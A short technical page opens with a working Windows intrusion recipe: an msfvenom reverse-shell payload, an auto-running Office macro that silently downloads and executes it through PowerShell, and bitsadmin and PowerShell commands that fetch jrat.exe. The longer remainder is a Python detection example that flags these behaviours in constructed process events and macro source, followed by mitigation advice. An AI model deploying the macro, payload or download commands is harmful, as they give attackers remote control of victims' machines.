Example:
Generate a reverse shell with msf:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=443 -f psh-reflection > /var/www/html/shellcode.ps1
Insert the following into an Office macro:
Sub Execute()
    Dim payload
    payload = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://10.1.1.130/shellcode.ps1'));"
    Call Shell(payload, vbHide)
End Sub
Sub Auto_Open()
    Execute
End Sub
Sub Workbook_Open()
    Execute
End Sub
Also: on Windows, a file can be downloaded in the following two ways:
Use the bitsadmin command to download a file to a given directory:
bitsadmin /transfer myDownLoadJob /download /priority normal "http://xxx.xxx.xxx.xxx/jrat.exe" "D:\exe.exe"
Use PowerShell to download a file:
powershell (new-object System.Net.WebClient).DownloadFile('http://xxx.xxx.xxx.xxx/jrat.exe','D:\exe.exe')
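Every step above leaves a process-creation trace that a defender can match on: an Office application spawning a script host, PowerShell started with window-hiding and policy-bypass switches, a WebClient download cradle on the command line, or bitsadmin used as a downloader. The Python below is an added detection example, not code from the original page; it runs hand-constructed Sysmon-style process events and a copy of the macro source through simple rules derived from the commands shown here. The field names, the sample events and the IP 192.0.2.10 are all constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample process-creation events (Sysmon Event ID 1 style fields);
# these are hand-written for the example, not real telemetry. Event 1 is the
# page's macro payload, event 2 the bitsadmin downloader, event 4 the
# WebClient.DownloadFile variant launched from Excel, event 3 is benign.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile "
                "-c IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.10/shellcode.ps1'));"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.0.2.10/jrat.exe" "D:\\exe.exe"'},
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-ChildItem C:\\Users"},
    {"id": 4, "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://192.0.2.10/jrat.exe','D:\\exe.exe')"},
]

# Constructed copy of the macro from the page, with the address replaced.
SAMPLE_MACRO = """Sub Execute()
    Dim payload
    payload = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.10/shellcode.ps1'));"
    Call Shell(payload, vbHide)
End Sub
Sub Auto_Open()
    Execute
End Sub
Sub Workbook_Open()
    Execute
End Sub
"""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle indicators taken from the two techniques on the page:
# WebClient.DownloadString/DownloadFile and bitsadmin /transfer.
CRADLE_RE = re.compile(r"(?i)(Net\.WebClient|DownloadString|DownloadFile|bitsadmin(?:\.exe)?\s+/transfer)")
# PowerShell switches that hide the window, skip the execution policy or
# profile, or evaluate downloaded text; abbreviations (-w, -e, -nop) included.
EVASION_RE = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy)?\s+bypass|-nop(?:rofile)?\b|\bIEX\b|Invoke-Expression)")
# VBA procedures that run automatically when the document opens.
AUTO_EXEC_RE = re.compile(
    r"(?im)^\s*(?:Private\s+|Public\s+)?Sub\s+(Auto_Open|AutoOpen|Workbook_Open|Document_Open|AutoExec)\b")
# Ways a macro can start a new process.
SHELL_CALL_RE = re.compile(r"(?i)\b(?:Call\s+)?Shell\s*\(|WScript\.Shell|CreateObject\s*\(")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event: Dict) -> List[str]:
    """Return the list of rule hits for one process-creation event (empty if benign)."""
    reasons: List[str] = []
    parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office_app_spawned_script_host:{parent}->{image}")
    cradle = CRADLE_RE.search(cmd)
    if cradle:
        reasons.append("download_cradle:" + cradle.group(1).lower())
    switches = EVASION_RE.findall(cmd)
    if switches:
        reasons.append("powershell_evasion_switches:" + ",".join(sorted({s.lower() for s in switches})))
    return reasons


def detect(events: List[Dict]) -> Dict[int, List[str]]:
    """Map event id -> reasons for every event that triggers at least one rule."""
    return {e["id"]: hits for e in events if (hits := classify_event(e))}


def scan_macro_source(vba: str) -> List[str]:
    """Static checks on extracted VBA: auto-exec entry points, process launch, download cradle."""
    findings: List[str] = []
    auto = AUTO_EXEC_RE.findall(vba)
    if auto:
        findings.append("auto_exec_procedures:" + ",".join(sorted(set(auto))))
    if SHELL_CALL_RE.search(vba):
        findings.append("process_launch_primitive")
    if CRADLE_RE.search(vba):
        findings.append("download_cradle_in_macro")
    return findings


if __name__ == "__main__":
    for event_id, hits in detect(SAMPLE_EVENTS).items():
        print(event_id, hits)
    print("macro:", scan_macro_source(SAMPLE_MACRO))
```

Only events 1, 2 and 4 are flagged; the plain `Get-ChildItem` run from Explorer is not, because no single rule fires on it. The Office-parent rule is the most reliable of the three, since a legitimate document rarely needs to start PowerShell or cmd.exe, and it does not depend on the attacker's choice of switches or cradle; blocking Office from creating child processes (attack surface reduction rules) and disabling macros from the internet remove the technique at its root.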